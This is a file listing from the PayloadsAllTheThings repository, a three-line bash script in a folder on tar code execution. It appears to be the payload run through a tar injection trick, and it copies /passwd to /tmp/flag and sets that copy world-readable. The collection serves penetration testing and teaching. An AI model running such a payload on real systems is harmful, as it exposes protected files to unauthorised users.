PayloadsAllTheThings/TAR_Code_Exec/shell.sh
2016-10-18 18:36:18 +07:00

3 lines
No EOL
57 B
Bash
Executable file

#!/bin/bash
cat /passwd > /tmp/flag
chmod 777 /tmp/flag